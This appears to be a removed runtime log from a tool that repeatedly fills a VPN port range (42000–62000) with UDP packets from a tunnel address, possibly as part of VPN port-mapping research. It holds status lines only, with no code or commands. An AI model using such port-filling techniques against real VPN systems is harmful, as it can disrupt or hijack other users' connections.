-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:40:05 -Starting port fill at 2020-09-06 05:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:41:05 -Starting port fill at 2020-09-06 05:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:42:06 -Starting port fill at 2020-09-06 05:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 05:43:06 -Starting port fill at 2020-09-06 05:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:44:06 -Starting port fill at 2020-09-06 05:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 05:45:06 -Starting port fill at 2020-09-06 05:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:46:06 -Starting port fill at 2020-09-06 05:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:47:05 -Starting port fill at 2020-09-06 05:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:48:04 -Starting port fill at 2020-09-06 05:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 05:49:06 -Starting port fill at 2020-09-06 05:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:50:04 -Starting port fill at 2020-09-06 05:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:51:06 -Starting port fill at 2020-09-06 05:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:52:05 -Starting port fill at 2020-09-06 05:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:53:04 -Starting port fill at 2020-09-06 05:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:54:04 -Starting port fill at 2020-09-06 05:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:55:05 -Starting port fill at 2020-09-06 05:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:56:05 -Starting port fill at 2020-09-06 05:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:57:05 -Starting port fill at 2020-09-06 05:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:58:05 -Starting port fill at 2020-09-06 05:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:59:05 -Starting port fill at 2020-09-06 06:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:00:05 -Starting port fill at 2020-09-06 06:01:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:01:05 -Starting port fill at 2020-09-06 06:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:02:06 -Starting port fill at 2020-09-06 06:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:03:05 -Starting port fill at 2020-09-06 06:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:04:06 -Starting port fill at 2020-09-06 06:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 